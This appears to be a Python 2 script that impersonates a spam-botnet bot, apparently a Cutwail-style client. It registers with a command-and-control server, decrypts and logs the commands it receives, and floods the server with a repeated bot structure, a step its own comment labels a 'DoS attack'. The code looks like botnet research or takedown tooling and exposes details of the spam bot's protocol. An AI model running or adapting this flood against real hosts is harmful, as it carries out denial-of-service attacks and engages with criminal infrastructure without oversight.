def process_package(rcvmsg, rtt=0, dbg=False, print_cmd=True): # Interpret RC command (1-9) cmd = struct.unpack("i", rcvmsg[0:4])[0] # struct.unpack() returns a tuple if cmd in range(1,10): if print_cmd: sys.stdout.write("[+] Received (RTT: " + str(rtt * 1000) \ + "ms, Pkg size: " + str(len(rcvmsg)) + "): ") if print_cmd: if cmd == RC_SLEEP: cprint("RC_SLEEP", "cyan") elif cmd == RC_GETWORK: cprint("RC_GETWORK", "cyan") elif cmd == RC_RESTART: cprint("RC_RESTART", "cyan") elif cmd == RC_UPDATE: cprint("RC_UPDATE", "cyan") elif cmd == RC_BID: cprint("RC_BID", "cyan") elif cmd == RC_TEMPLATE: cprint("RC_TEMPLATE", "cyan") elif cmd == RC_CONFIG: cprint("RC_CONFIG", "cyan") elif cmd == RC_MAILFROM: cprint("RC_MAILFROM", "cyan") elif cmd == RC_ACCOUNTS: cprint("RC_ACCOUNTS", "cyan") # Decrypt data received if len(rcvmsg) > 8: dec = pdecrypt(rcvmsg[8:], len(rcvmsg[8:])) if dbg: cprint("Decrypted:\n" + hexdump(dec), "yellow") # Command actions if cmd == RC_BID: # Extract the BID from the decrypted data bid = struct.unpack("i", dec[0:4])[0] # Extract sign.timer from the decrypted data timer = struct.unpack("i", dec[8:12])[0] if dbg: cprint("[+] Assigned BID: " + str(bid) \ + ", Timer: " + str(timer), "green") return bid
def get_bid(s): while True: try: # Try receiving data rcvmsg = s.recv(1024) # Check whether connection is closed if rcvmsg == "": break # Got server response: cmd = struct.unpack("i", rcvmsg[0:4])[0] if cmd == RC_BID: # Decrypt data received dec = pdecrypt(rcvmsg[8:], len(rcvmsg[8:])) # Extract the BID from the decrypted data bid = struct.unpack("i", dec[0:4])[0] return bid except socket.error as e: print "[-]", str(e)
def main(): # Socket configurations s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.settimeout(3.0) # Set 3s timeout # Connect s.connect((HOST, PORT)) cprint("\n[*] Sending data to " + HOST + " : " + str(PORT) \ + " (hexdump below)\n", "green") # Initialise bot_info, bot_rheader, botbulk_info structures bot_info = BOT_INFO() bot_rheader = BOT_RHEADER() botbulk_info = BOTBULK_INFO() # Populate bot_rheader structure bot_rheader.bid = 0 bot_rheader.iplocal = 2886783745 # Should be INT bot_rheader.botver = 116 bot_rheader.confver = 1 bot_rheader.mfver = 1 bot_rheader.winver = 1 bot_rheader.flags = 1 bot_rheader.smtp = 1 bot_rheader.size = 32 # Conversion: Structure -> Bytes (Str) #bot_info.bufrecv = buffer(bot_rheader)[:] # Same as pack() bufrecv = buffer(bot_rheader)[:] bufrecv_enc = pencrypt(bufrecv, len(bufrecv)) # Try encrypting # Populate bot_info structure bot_info.ip = "\254\020\323\001" # char[4] #bot_info.have_ip = 1 bot_info.bufrecv = bufrecv_enc bot_info.bufsize = 32 bot_info.bid = 0 """ bot_info.bufsend = "" bot_info.bufdata = "" bot_info.bufsmall = 10000 bot_info.id = 0 bot_info.sd = 5 bot_info.timer = 2 bot_info.state = 2 bot_info.blackliststatus = 0 bot_info.bshcommand = 0 bot_info.flags = 0 bot_info.botbulk = pointer(botbulk_info) # Statistics bot_info.bsent = 0 bot_info.bnouser = 0 bot_info.bunlucky = 0 bot_info.bunksmtpansw = 0 bot_info.bblacklisted = 0 bot_info.bmailfrombad = 0 bot_info.bgraylisted = 0 bot_info.bnomx = 0 bot_info.bnomxip = 0 bot_info.bnoaliveip = 0 bot_info.bsmtptimeout = 0 bot_info.bconnect = 0 bot_info.brecv = 0 bot_info.bbotmailtimeout = 0 bot_info.bspammessage = 0 bot_info.bnohostname = 0 bot_info.blckmx = 0 bot_info.captcha_good = 0 bot_info.captcha_total = 0 refbulk = (c_byte * 4)() bot_info.refbulk = cast(refbulk, POINTER(c_int)) bot_info.refbulk_size = 0 """ # Send print hexdump(buffer(bot_info)[:]) s.sendall(buffer(bot_info)[:] * 100) cprint("[+] Sent! Now waiting to receive data...\n", "green") # Initialise recv buffer buf = "" # Listen on host while True: try: # Try receiving data rcvmsg = s.recv(1024) # Check whether connection is closed if rcvmsg == "": break # Got some data! sys.stdout.write("[+] Received: ") # Interpret command cmd = ord(rcvmsg[0]) if cmd == RC_SLEEP: cprint("RC_SLEEP", "cyan") elif cmd == RC_GETWORK: cprint("RC_GETWORK", "cyan") elif cmd == RC_RESTART: cprint("RC_RESTART", "cyan") elif cmd == RC_UPDATE: cprint("RC_UPDATE", "cyan") elif cmd == RC_BID: cprint("RC_BID", "cyan") elif cmd == RC_TEMPLATE: cprint("RC_TEMPLATE", "cyan") elif cmd == RC_CONFIG: cprint("RC_CONFIG", "cyan") elif cmd == RC_MAILFROM: cprint("RC_MAILFROM", "cyan") elif cmd == RC_ACCOUNTS: cprint("RC_ACCOUNTS", "cyan") print hexdump(rcvmsg) # Store data in buffer (for later use) buf += rcvmsg except socket.timeout: # Timed out on receiving data: # Let's check out the contents of recv buffer (if not empty) if buf: # Decrypt recv buffer dec = pdecrypt(buf, len(buf)) print "[+] Decrypted:\n", dec, "\n" # Clear recv buffer buf = "" cprint("[*] Listening for incoming data (press Ctrl+C to quit)\n" \ , "green") # DoS attack s.sendall(buffer(bot_info)[:] * 100) # Close socket s.close()